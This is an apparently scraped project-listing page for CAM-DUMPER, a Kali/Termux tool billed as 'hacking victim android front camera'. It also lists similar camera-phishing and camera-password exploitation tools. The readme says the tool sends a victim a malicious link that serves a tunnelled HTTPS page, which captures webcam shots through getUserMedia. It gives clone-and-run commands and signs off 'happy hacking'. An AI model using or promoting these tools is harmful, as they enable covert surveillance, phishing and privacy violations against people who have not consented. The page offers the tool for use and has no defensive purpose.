All Projects → LiNuX-Mallu → CAM-DUMPER

LiNuX-Mallu / CAM-DUMPER

Licence: GPL-3.0 license
KALI LINUX / TERMUX tool for hacking victim android front camera.

Programming Languages

shell
77523 projects
HTML
75241 projects
PHP
23972 projects - #3 most used programming language

Projects that are alternatives of or similar to CAM-DUMPER

CamHacker
Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!
Stars: ✭ 280 (-45.31%)
Mutual labels:  camera-hacking, camera-phishing
CamOver
CamOver is a camera exploitation tool that allows to disclosure network camera admin password.
Stars: ✭ 217 (-57.62%)
Mutual labels:  camera-hacking
seeu
SeeU is a camera hacking tool which is used to hack selfie camera of devices....
Stars: ✭ 313 (-38.87%)
Mutual labels:  camera-hacking
CamRaptor
CamRaptor is a tool that exploits several vulnerabilities in popular DVR cameras to obtain network camera credentials.
Stars: ✭ 106 (-79.3%)
Mutual labels:  camera-hacking

CAM-DUMPER

Take webcam shots from target by just sending a malicious link

How it works?

The tool generates a malicious HTTPS page using Serveo or Ngrok Port Forwarding methods, and a javascript code to cam requests using MediaDevices.getUserMedia.

The MediaDevices.getUserMedia() method prompts the user for permission to use a media input which produces a MediaStream with tracks containing the requested types of media. That stream can include, for example, a video track (produced by either a hardware or virtual video source such as a camera, video recording device, screen sharing service, and so forth), an audio track (similarly, produced by a physical or virtual audio source like a microphone, A/D converter, or the like), and possibly other track types.

See more about MediaDEvices.getUserMedia() here

Installing (Kali Linux/Termux):

$ apt update && apt upgrade
$ apt install git php wget curl jq
$ git clone https://github.com/LiNuX-Mallu/CAM-DUMPER.git
$ cd CAM-DUMPER
$ chmod +x camdumper.sh
$ ./camdumper.sh

Termux users should install MATERIAL FILES app from playstore for easy managing captured files.

happy hacking : ]

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].